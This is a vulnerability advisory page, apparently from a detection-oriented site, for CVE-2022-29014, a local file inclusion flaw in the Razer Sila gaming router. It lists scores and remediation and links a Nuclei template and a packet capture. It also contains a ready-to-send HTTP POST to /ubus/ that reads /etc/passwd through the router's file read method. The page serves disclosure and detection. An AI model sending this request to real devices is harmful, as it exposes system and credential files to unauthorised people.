🔙 목록으로 돌아가기

CVE-2022-29014: Razer Sila Gaming Router 2.0.441_api-2.0.418 - Local File Inclusion

TitleRazer Sila Gaming Router 2.0.441_api-2.0.418 - Local File Inclusion
Authoredoardottt
SeverityHigh
ImpactSuccessful exploitation of this vulnerability could allow an attacker to read sensitive files on the system.
RemediationApply the latest firmware update provided by Razer to fix the Local File Inclusion vulnerability.
CVSS Score7.5
EPSS Score0.86201
CVE IDCVE-2022-29014
Tags cve cve2022 edb packetstorm razer lfi router vkev vuln

🔍 Vulnerability Description

Razer Sila Gaming Router 2.0.441_api-2.0.418 is vulnerable to local file inclusion which could allow attackers to read arbitrary files.

🌐 HTTP Request

POST /ubus/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.7.20) Gecko/ Firefox/3.6.7
Connection: close
Content-Length: 123
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

{"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]}

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-29014.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-29014.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A